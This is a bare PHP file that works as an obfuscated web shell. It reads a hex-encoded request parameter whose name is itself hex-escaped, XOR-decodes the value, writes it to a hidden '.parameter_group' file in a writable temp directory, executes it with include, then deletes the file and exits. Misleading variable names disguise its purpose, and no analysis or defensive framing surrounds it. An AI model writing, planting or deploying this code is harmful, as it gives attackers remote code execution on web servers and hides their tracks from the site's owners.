<?php

if(!empty($_REQUEST["\x69\x74em"])){
	$ent = hex2bin($_REQUEST["\x69\x74em"]);
	$flag   =   '' ; foreach(str_split($ent) as $char){$flag .= chr(ord($char) ^ 35);}
	$val = array_filter([session_save_path(), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), getenv("TMP")]);
	for ($token = 0, $entity = count($val); $token < $entity; $token++) {
    $obj = $val[$token];
    		if (is_writable($obj) && is_dir($obj)) {
    $hld = str_replace("{var_dir}", $obj, "{var_dir}/.parameter_group");
    $file = fopen($hld, 'w');
if ($file) {
	fwrite($file, $flag);
	fclose($file);
	include $hld;
	@unlink($hld);
	die();
}
}
}
}